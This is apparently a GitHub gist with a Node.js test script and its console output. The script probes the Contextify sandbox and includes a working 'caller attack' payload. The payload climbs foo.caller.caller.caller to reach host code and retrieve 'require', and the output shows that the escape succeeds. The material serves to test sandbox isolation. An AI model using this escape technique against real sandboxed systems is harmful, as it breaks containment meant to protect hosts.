Created
January 17, 2013 16:47
-
-
Save anonymous/4557432 to your computer and use it in GitHub Desktop.
Contextify caller attack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| d:\node\contextify-test>node index.js | |
| -- simple assign to this -- | |
| 2 | |
| -- global access (require) -- | |
| require is not defined | |
| -- caller attack -- | |
| function require(path) { | |
| return self.require(path); | |
| } | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Contextify = require('contextify'); | |
| var sandbox = { console: console }; | |
| Contextify(sandbox); | |
| //this points to our sandbox. | |
| console.log("-- simple assign to this --"); | |
| sandbox.run("this.x = 2"); | |
| console.log(sandbox.x); | |
| console.log(""); | |
| //make sure we can't access global variables. | |
| console.log("-- global access (require) --"); | |
| try | |
| { | |
| sandbox.run("this.require = require"); | |
| } | |
| catch(e) | |
| { | |
| console.log(e.message); | |
| } | |
| console.log(""); | |
| //make sure we can't access caller.caller.etc | |
| console.log("-- caller attack --"); | |
| //sandbox.run("var self=this;(function foo(){ return console.log(foo.caller.caller.caller.toString());})()"); | |
| sandbox.run("(function foo(){ return console.log(foo.caller.caller.caller('return require.toString()'));})()"); | |
| console.log(""); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment